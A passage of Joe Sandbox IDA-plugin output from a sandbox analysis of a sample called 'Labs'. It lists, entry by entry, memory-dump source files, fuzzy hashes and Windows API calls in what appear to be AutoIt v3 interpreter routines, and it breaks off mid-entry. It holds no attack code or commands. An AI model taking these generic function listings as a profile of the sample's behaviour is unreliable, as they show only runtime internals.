                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                    • String ID: Line %d: $AutoIt - $''
                                                    • API String ID: 230667853-395788996
                                                    • Opcode ID: 6431b1ccc8bc5e5606e3602c72b165b626cdb1d2f59e960ab11bf6bae6757fbf
                                                    • Instruction ID: fe9b65077d22144cf393183ad7111cc3f8b246d4a075470dd2cede177e54f65b
                                                    • Opcode Fuzzy Hash: 6431b1ccc8bc5e5606e3602c72b165b626cdb1d2f59e960ab11bf6bae6757fbf
                                                    • Instruction Fuzzy Hash: 464193B1048304EAD321FB60DC49FDF77ECAF84350F504A1EF195921A2EB78A649CB96
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                    • ShowWindow.USER32(00000000), ref: 0078513E
                                                    • ShowWindow.USER32(00000000), ref: 00785147
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                    • Instruction ID: 448877307bab512a9c848268561ac21fb5d33204806bd9a172e5802d15e852d7
                                                    • Opcode Fuzzy Hash: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                    • Instruction Fuzzy Hash: 21F03AB06442947EEA7117276C08F372EBDF7C6F20F00041AB900A22B1CA655840DEB0
                                                    APIs
                                                      • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                      • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                      • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                    • _free.LIBCMT ref: 007D9C5F
                                                    • _free.LIBCMT ref: 007D9C66
                                                    • _free.LIBCMT ref: 007D9CD1
                                                      • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                      • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                    • _free.LIBCMT ref: 007D9CD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 1552873950-2806939583
                                                    • Opcode ID: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                    • Instruction ID: bcacbddf0976f39138d6e6cb0fc9a4de801c241592e2e32aec5cdf969efdd23d
                                                    • Opcode Fuzzy Hash: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                    • Instruction Fuzzy Hash: E15149B1904219EFDF24EF64DC85AAEBBB9FF48304F00409EB249A7341DB755A808F59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction ID: 72093f9a23a7f21224305384438e78ba48d8c6feb7d0fcc2392439768f63b933
                                                    • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction Fuzzy Hash: 2C51D430A00B25DBDF268FB9E88466E77B6EF41720F24872DF835962D0D7789E509B40
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077534A
                                                    • TranslateMessage.USER32(?), ref: 00775356
                                                    • DispatchMessageW.USER32(?), ref: 00775360
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                    • Instruction ID: 3e3594d673c05dc2df3ff617d0222038a8820727a8f458930f12ea4b350b6331
                                                    • Opcode Fuzzy Hash: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                    • Instruction Fuzzy Hash: 4931F670508B059EEF308B64DC48BBA37A8BB82388F148569E42B971F1D7FDD845E711
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D581B
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5829
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5831
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D583B
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
                                                    • Instruction ID: 51c7f7fcab526f449ce18a9b19d5f79436462491fd06886c3faa4777dbcbe7bb
                                                    • Opcode Fuzzy Hash: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
                                                    • Instruction Fuzzy Hash: E7018C31D01A1DDBCF009FE4DC48AEDBBB8FF08711F004556E442B2241DB389594DBA1
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712A8
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712C9
                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                    • Instruction ID: 3ada228c7bf1c8f4b1e4da7620f027b32513af0078e816bbdcc49e1f9cbb2d6f
                                                    • Opcode Fuzzy Hash: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                    • Instruction Fuzzy Hash: 33111575610208BFDF208FA8DC84EEEBBACFF05781F508569E809D7210E6759E449BA4
                                                    APIs
                                                    • _memset.LIBCMT ref: 00785B58
                                                      • Part of subcall function 007856F8: _memset.LIBCMT ref: 00785787
                                                      • Part of subcall function 007856F8: _wcscpy.LIBCMT ref: 007857DB
                                                      • Part of subcall function 007856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00785BAD
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00785BBC
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C0D7C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                    • Instruction ID: 1c6cb560f312ff44c77265eaccedf7eb84ca21f360b07dbddde63f9df895766b
                                                    • Opcode Fuzzy Hash: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                    • Instruction Fuzzy Hash: C221DAB0544B84EFEB739B64C895FEBBFECAF11314F04048DE69A56141C3786A84CB91
                                                    APIs
                                                      • Part of subcall function 007849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                    • _free.LIBCMT ref: 007BFB04
                                                    • _free.LIBCMT ref: 007BFB4B
                                                      • Part of subcall function 007829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                    Strings
                                                    • Bad directive syntax error, xrefs: 007BFB33
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: Bad directive syntax error
                                                    • API String ID: 2861923089-2118420937
                                                    • Opcode ID: 2aa258cef5d7b77f613ba2de0e3427806f3961017e0073f2def3cf12f5820153
                                                    • Instruction ID: 6b30583d3572ebd7f098fb14bd01a3caf358c98a732732d0325265769341578e
                                                    • Opcode Fuzzy Hash: 2aa258cef5d7b77f613ba2de0e3427806f3961017e0073f2def3cf12f5820153
                                                    • Instruction Fuzzy Hash: BD914E71950219EFCF18EFA8CC55AEDB7B4FF05710F14852AF815AB291EB38A905CB50
                                                    APIs
                                                      • Part of subcall function 00784AB2: __fread_nolock.LIBCMT ref: 00784AD0
                                                    • _wcscmp.LIBCMT ref: 007D9DE1
                                                    • _wcscmp.LIBCMT ref: 007D9DF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                    • Instruction ID: e152e9df3fca6ca2450634e3d1d566c437a9cd4aeae447c6c4c8823e0cf7f848
                                                    • Opcode Fuzzy Hash: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                    • Instruction Fuzzy Hash: D841D972A4021AFADF21EAE4CC49FDF7BBDEF45710F00446AFA00BB281D67999448765
                                                    APIs
                                                    • _memset.LIBCMT ref: 007E2C6A
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E2CA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: eb31296273077a2ef079a349760adae8f713b8699a99e0fdade8e5d279774d3c
                                                    • Instruction ID: 1f5d9ab5656d3a3f989b61f56450048a5ce2ff6a0736cbb20c875be9bed2c5d4
                                                    • Opcode Fuzzy Hash: eb31296273077a2ef079a349760adae8f713b8699a99e0fdade8e5d279774d3c
                                                    • Instruction Fuzzy Hash: E7313971D01219EBCF01EFA1DC89AEEBFB9FF08300F100059F915A6262EB355916DBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 007C032B
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 007C0375
                                                      • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                      • Part of subcall function 007909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                    • Instruction ID: 5bcf1942f814b1a1f9a3d16a1b6b64fd76271beba51ec41e40585f88dcddd953
                                                    • Opcode Fuzzy Hash: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                    • Instruction Fuzzy Hash: 04218171A142989BDF41DFD8D849BEE7BFCAF49710F00405AE504E7241DBB85A89CFA1
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E28F8
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E2921
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                    • Instruction ID: 5e242ca9f9a2ccf7828a8f1e1d960cf50eef5893c1467d119f04d90951f4f4fb
                                                    • Opcode Fuzzy Hash: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
                                                    • Instruction Fuzzy Hash: 07110670502365BAEB248F528C89EF7FB6CFF19350F10412AF54552101E7786892DBF0
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d85a69d3523379ad78f065a055f064877c3b345c87219f5dd0837ea8ac7bdc5
                                                    • Instruction ID: eb47c197e284dd6059f8fadd1c8c770a5abfae1e73500e8387f65c1e6467cd2f
                                                    • Opcode Fuzzy Hash: 9d85a69d3523379ad78f065a055f064877c3b345c87219f5dd0837ea8ac7bdc5
                                                    • Instruction Fuzzy Hash: 77F12570608340DFCB24DF29C484A6ABBE5BF89354F14892EF8999B251D734ED45CF92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 25620d6b933b61d058b7dd1d59b0dd720da150978fb2081ffda6a6c0949c0e4b
                                                    • Instruction ID: 500f12699de5fe434c678caa8e385ea8c45a9fda0f0653579cfc12f657a9fbec
                                                    • Opcode Fuzzy Hash: 25620d6b933b61d058b7dd1d59b0dd720da150978fb2081ffda6a6c0949c0e4b
                                                    • Instruction Fuzzy Hash: FA61E071600209EBDF009F29D8806AA77B9FF44710F95C169EC59CF295EB39DA61CB50
                                                    APIs
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                      • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                      • Part of subcall function 0078FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077AC6B), ref: 0078FFA7
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077AD08
                                                    • OleInitialize.OLE32(00000000), ref: 0077AD85
                                                    • CloseHandle.KERNEL32(00000000), ref: 007B2F56
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 1986988660-0
                                                    • Opcode ID: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                    • Instruction ID: 8150bfc902fd9bbe208aeb21053630e7e8963b1921fd4feb30e29d220c70c508
                                                    • Opcode Fuzzy Hash: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                    • Instruction Fuzzy Hash: B281CAF0909284CED3A8EF69AC496557FE8FBD8304B40896AD558C7372E774E408DF98
                                                    APIs
                                                    • _memset.LIBCMT ref: 007859F9
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00785ABB
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
                                                    • Instruction ID: 72354979800def0c80197d01cc0d4f6a4f2d88627ccc2b2214f71ed0fd8f7bac
